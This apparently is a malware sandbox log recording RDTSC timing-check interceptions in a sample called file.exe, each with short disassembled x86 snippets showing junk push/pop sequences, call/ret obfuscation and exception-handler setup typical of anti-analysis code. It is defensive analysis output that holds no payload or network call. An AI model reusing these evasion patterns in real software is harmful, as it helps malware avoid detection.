Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62B1 second address: 4F62C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62C1 second address: 4F62C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62C5 second address: 4F62CF instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62CF second address: 4F62D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62D5 second address: 4F62D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62D9 second address: 4F6320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F8B150D74F8h 0x00000014 pop eax 0x00000015 mov edi, ebx 0x00000017 call 00007F8B150D74E9h 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007F8B150D74ECh 0x00000024 jl 00007F8B150D74E6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6320 second address: 4F6369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b ja 00007F8B146BCD69h 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 ja 00007F8B146BCD5Ch 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F67FA second address: 4F67FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F67FE second address: 4F6804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F68C0 second address: 4F68C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6A16 second address: 4F6A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6A1A second address: 4F6A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6FAF second address: 4F6FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6FB3 second address: 4F6FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6FB9 second address: 4F6FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7058 second address: 4F705C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F705C second address: 4F7062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7433 second address: 4F7437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7437 second address: 4F7467 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8B146BCD64h 0x0000000e pushad 0x0000000f jmp 00007F8B146BCD60h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F762F second address: 4F7635 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7635 second address: 4F763B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F8B56 second address: 4F8B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90F4 second address: 4F9163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007F8B146BCD5Eh 0x0000000e pop ecx 0x0000000f nop 0x00000010 pushad 0x00000011 mov ebx, dword ptr [ebp+122D282Dh] 0x00000017 jg 00007F8B146BCD5Ah 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F8B146BCD58h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov edi, dword ptr [ebp+122D2B31h] 0x00000040 push 00000000h 0x00000042 mov esi, 31BE0061h 0x00000047 jl 00007F8B146BCD5Ch 0x0000004d sub esi, dword ptr [ebp+122D1BC1h] 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9163 second address: 4F916D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8B150D74E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9B3C second address: 4F9B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8B146BCD56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB791 second address: 4FB797 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB797 second address: 4FB79D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB79D second address: 4FB81F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007F8B150D74EEh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F8B150D74E8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dword ptr [ebp+12460404h], edx 0x00000030 mov dword ptr [ebp+122D1CBAh], ecx 0x00000036 push 00000000h 0x00000038 movsx esi, cx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F8B150D74E8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F8B150D74F7h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB553 second address: 4FB559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB559 second address: 4FB55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB55D second address: 4FB561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBFF6 second address: 4FBFFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCDA2 second address: 4FCDA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCDA6 second address: 4FCDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCB59 second address: 4FCB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD5F6 second address: 4FD5FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504687 second address: 50468B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505692 second address: 5056A6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8B150D74E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5056A6 second address: 5056AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50479B second address: 5047AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5047AB second address: 5047B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5047B0 second address: 504833 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B150D74F8h 0x00000008 jmp 00007F8B150D74F2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+122D2889h] 0x00000016 mov dword ptr [ebp+12482082h], esi 0x0000001c push dword ptr fs:[00000000h] 0x00000023 sub dword ptr [ebp+122D1C62h], esi 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 sub dword ptr [ebp+122D1BCFh], eax 0x00000036 jnl 00007F8B150D74EEh 0x0000003c jo 00007F8B150D74E8h 0x00000042 push eax 0x00000043 pop ebx 0x00000044 mov eax, dword ptr [ebp+122D0EF1h] 0x0000004a mov bh, BDh 0x0000004c push FFFFFFFFh 0x0000004e mov bx, 84DDh 0x00000052 nop 0x00000053 jbe 00007F8B150D74FEh 0x00000059 push eax 0x0000005a push edi 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505857 second address: 5058FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F8B146BCD58h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F8B146BCD58h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 sbb edi, 060D4AEEh 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 jmp 00007F8B146BCD68h 0x00000055 mov eax, dword ptr [ebp+122D1509h] 0x0000005b push eax 0x0000005c mov ebx, dword ptr [ebp+122D3927h] 0x00000062 pop edi 0x00000063 push FFFFFFFFh 0x00000065 mov dword ptr [ebp+122D18F7h], edx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F8B146BCD5Fh 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5067E2 second address: 506821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74F9h 0x00000009 popad 0x0000000a jne 00007F8B150D74E8h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8B150D74F3h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 506821 second address: 506825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 506825 second address: 50682B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50AEFA second address: 50AEFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50AEFE second address: 50AF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F8B150D74E8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jne 00007F8B150D74ECh 0x00000028 push 00000000h 0x0000002a mov bh, dl 0x0000002c push 00000000h 0x0000002e mov edi, 5C9AF717h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50AF40 second address: 50AF53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B179 second address: 50B17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E130 second address: 50E136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E136 second address: 50E13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D217 second address: 50D21D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D21D second address: 50D223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E13A second address: 50E1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F8B146BCD58h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 movsx ebx, cx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F8B146BCD58h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 push ebx 0x00000045 mov dword ptr [ebp+122D26ACh], eax 0x0000004b pop edi 0x0000004c call 00007F8B146BCD61h 0x00000051 xor bh, 00000040h 0x00000054 pop edi 0x00000055 push 00000000h 0x00000057 mov ebx, dword ptr [ebp+124655DAh] 0x0000005d push eax 0x0000005e jc 00007F8B146BCD60h 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510360 second address: 510364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5111B7 second address: 5111BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5111BB second address: 5111BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51127C second address: 511283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 513326 second address: 513331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8B150D74E6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5123D7 second address: 5123DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51345A second address: 51345F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51345F second address: 5134C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D2C63h], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F8B146BCD58h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov bx, di 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c cmc 0x0000003d mov eax, dword ptr [ebp+122D0B95h] 0x00000043 mov bh, 2Ah 0x00000045 push FFFFFFFFh 0x00000047 mov dword ptr [ebp+122D1DE7h], ecx 0x0000004d nop 0x0000004e jng 00007F8B146BCD6Dh 0x00000054 push eax 0x00000055 push edx 0x00000056 jno 00007F8B146BCD56h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5134C6 second address: 5134DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F8B150D74EEh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515200 second address: 515222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515222 second address: 515227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514408 second address: 51440C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51440C second address: 514410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515227 second address: 51522D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519CCA second address: 519CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519CCE second address: 519CD8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519CD8 second address: 519CE2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B150D74ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51DE4C second address: 51DE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8B146BCD66h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51DE6D second address: 51DE75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51DE75 second address: 51DE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521177 second address: 52117B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A844C second address: 4A8453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8453 second address: 4A8467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8B150D74EEh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8467 second address: 4A846B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBFF2 second address: 4FBFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A404 second address: 52A422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F8B146BE726h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52ADCF second address: 52ADFD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B14C5BA96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F8B14C5BAABh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52ADFD second address: 52AE03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AF3F second address: 52AF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AF43 second address: 52AF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AF49 second address: 52AF50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0E8 second address: 52B0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0F0 second address: 52B0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
